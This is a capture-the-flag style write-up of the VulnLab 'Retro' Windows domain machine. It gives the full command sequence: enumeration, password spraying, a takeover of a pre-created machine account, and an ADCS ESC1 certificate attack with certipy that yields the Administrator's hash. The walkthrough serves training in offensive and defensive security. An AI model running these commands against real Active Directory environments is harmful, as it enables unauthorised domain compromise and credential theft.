VulnLab - Retro Writeup

👾 Machine Overview

Thumbnail

This is a writeup of the machine Retro from VulnLab , it’s an easy difficulty Windows machine which featured pre-created machine accounts.

🔍 Enumeration

An initial nmap scan of the host gave the following results:

nmap -sV -sC -Pn 10.10.122.138
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-14 19:28 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 0.50% done
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 1.00% done; ETC: 19:33 (0:04:57 remaining)
Nmap scan report for 10.10.122.138
Host is up (0.10s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT    STATE SERVICE      VERSION
88/tcp  open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-14 23:28:49Z)
389/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-14T23:29:01+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
464/tcp open  kpasswd5?
593/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp open  ssl/ldap     Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
|_ssl-date: 2024-10-14T23:29:01+00:00; -2s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.38 seconds

I started off by adding retro.vl and dc.retro.vl to my /etc/hosts.

🏁 Initial Access

I tried anonymous LDAP to no avail. But I was able to authenticate using the Guest account.

nxc smb retro.vl -u "Guest" -p ""
SMB         10.10.122.138   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.122.138   445    DC               [+] retro.vl\Guest:

From here, I brute forced RIDs to get a userlist.

nxc smb retro.vl -u "Guest" -p "" --rid-brute

Here’s our list of accounts:

jburley
HelpDesk
tblack
trainee
DC$
BANKING$

I tried spraying a null password at all these accounts, and was able to get a hit for the HelpDesk account.

nxc smb retro.vl -u user.list -p "" --continue-on-success
SMB         10.10.122.138   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.122.138   445    DC               [-] retro.vl\DC$: STATUS_LOGON_FAILURE 
SMB         10.10.122.138   445    DC               [-] retro.vl\BANKING$: STATUS_LOGON_FAILURE 
SMB         10.10.122.138   445    DC               [-] retro.vl\jburley: STATUS_LOGON_FAILURE 
SMB         10.10.122.138   445    DC               [+] retro.vl\HelpDesk: 
SMB         10.10.122.138   445    DC               [-] retro.vl\tblack: STATUS_LOGON_FAILURE 
SMB         10.10.122.138   445    DC               [-] retro.vl\trainee: STATUS_LOGON_FAILURE

📂 SMB

Anonymous access was allowed for SMB, and there was an interesting share Trainees.

smbclient -L //retro.vl//
Password for [WORKGROUP\lfgberg]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	Notes           Disk      
	SYSVOL          Disk      Logon server share 
	Trainees        Disk      
SMB1 disabled -- no workgroup available

Within that share is the file Important.txt.

smb: \> dir
  .                                   D        0  Sun Jul 23 17:58:43 2023
  ..                                DHS        0  Wed Jul 26 05:54:14 2023
  Important.txt                       A      288  Sun Jul 23 18:00:13 2023

		6261499 blocks of size 4096. 2266513 blocks available
smb: \> get Important.txt
getting file \Important.txt of size 288 as Important.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)

The file says that the admins have rolled all their trainees into a single account with an easy to remember password.

Dear Trainees,

I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.

Regards

The Admins%

I tried out the creds trainee:trainee, and they worked to authenticate via LDAP.

nxc ldap retro.vl -u "trainee" -p "trainee"
SMB         10.10.122.138   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
LDAP        10.10.122.138   389    DC               [+] retro.vl\trainee:trainee

Now as the trainee, we can access the Notes share.

❯ smbclient -U trainee%trainee \\\\retro.vl\\Notes
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Jul 23 18:03:16 2023
  ..                                DHS        0  Wed Jul 26 05:54:14 2023
  ToDo.txt                            A      248  Sun Jul 23 18:05:56 2023
g
		6261499 blocks of size 4096. 2889722 blocks available
smb: \> get ToDo.txt 
getting file \ToDo.txt of size 248 as ToDo.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \>

There’s a ToDo file we can grab.

Thomas,

after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.

Best

James

👴💻 Pre-Created Machine Account

The ToDo file contains a note which talks about a pre-created machine account . When a machine account is created, if Assign this computer account as a pre-Windows 2000 computer is set, then the initial password is the same as the account name (in lowercase). If the account hasn’t been authenticated to yet, we can change it’s password.

First we need to try to authenticate to the account:

smbclient -U BANKING$%banking \\\\retro.vl\\Notes
session setup failed: NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT

smbclient -U BANKING$%notthepass \\\\retro.vl\\Notes
session setup failed: NT_STATUS_LOGON_FAILURE

Since we get NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT when using the password banking on the machine account, this looks to be the case.

We can use Impacket’s changepasswd.py to reset the password.

changepasswd.py -protocol rpc-samr retro.vl/BANKING\$@10.10.122.138 -newpass Password123
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Current password: 
[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.

🏦 Banking

Next, I ran Bloodhound to see what our BANKING$ account can do.

bloodhound-python -d retro.vl -u BANKING$ -p 'Password123' -ns 10.10.122.138 -c all
INFO: Found AD domain: retro.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.retro.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.retro.vl
INFO: Found 7 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: 
INFO: Querying computer: DC.retro.vl
INFO: Done in 00M 20S

I didn’t see anything fun here, so I ran certipy find next to see if there’s any vulnerable certificate templates in ADCS.

The RetroClients template looks to be vulnerable to good old ESC1 .

"Certificate Templates": {
  "0": {
    "Template Name": "RetroClients",
    "Display Name": "Retro Clients",
    "Certificate Authorities": [
      "retro-DC-CA"
    ],
    "Enabled": true,
    "Client Authentication": true,
    "Enrollment Agent": false,
    "Any Purpose": false,
    "Enrollee Supplies Subject": true,
    "Certificate Name Flag": [
      "EnrolleeSuppliesSubject"
    ],
    "Enrollment Flag": [
      "None"
    ],
    "Private Key Flag": [
      "16842752"
    ],
    "Extended Key Usage": [
      "Client Authentication"
    ],
    "Requires Manager Approval": false,
    "Requires Key Archival": false,
    "Authorized Signatures Required": 0,
    "Validity Period": "1 year",
    "Renewal Period": "6 weeks",
    "Minimum RSA Key Length": 4096,
    "Permissions": {
      "Enrollment Permissions": {
        "Enrollment Rights": [
          "RETRO.VL\\Domain Admins",
          "RETRO.VL\\Domain Computers",
          "RETRO.VL\\Enterprise Admins"
        ]
      },
      "Object Control Permissions": {
        "Owner": "RETRO.VL\\Administrator",
        "Write Owner Principals": [
          "RETRO.VL\\Domain Admins",
          "RETRO.VL\\Enterprise Admins",
          "RETRO.VL\\Administrator"
        ],
        "Write Dacl Principals": [
          "RETRO.VL\\Domain Admins",
          "RETRO.VL\\Enterprise Admins",
          "RETRO.VL\\Administrator"
        ],
        "Write Property Principals": [
          "RETRO.VL\\Domain Admins",
          "RETRO.VL\\Enterprise Admins",
          "RETRO.VL\\Administrator"
        ]
      }
    },
    "[!] Vulnerabilities": {
      "ESC1": "'RETRO.VL\\\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication"
    }
  }
}

Domain computers can enroll, supplying the subject, and allowing client authentication. This means we can use our BANKING$ machine account to perform this attack.

First we need to request a certificate supplying the administrator as the subject.

1	certipy req -username BANKING\$@retro.vl -password Password123 -target-ip 10.10.122.138 -ca 'retro-DC-CA' -template 'RetroClients' -upn '[email protected]'

This didn’t work, I kept getting a key size error. We can fix this by appending -key-size 4096.

certipy req -username BANKING\$@retro.vl -password Password123 -target-ip 10.10.122.138 -ca 'retro-DC-CA' -template 'RetroClients' -upn '[email protected]' -key-size 4096 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Trying to resolve 'RETRO.VL' at '127.0.0.53'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.122.138[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.122.138[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 12
[*] Got certificate with UPN '[email protected]'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Now, we can authenticate with this certificate to get the admin’s hash.

certipy auth -pfx 'administrator.pfx' -username 'Administrator' -domain 'retro.vl' -dc-ip 10.10.122.138
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for '[email protected]': [SNIPPED]

Lastly, we can use this to WinRM in and grab the flag, YIPPEE!

📖 Resources

🔗 Hyperlink	ℹ️ Info
MindPoint	GPP PrivEsc
TrustedSec	Pre Created Machine Accounts
Cybersec Notes	Pre Created Machine Accounts
CyberSec Notes	ESC1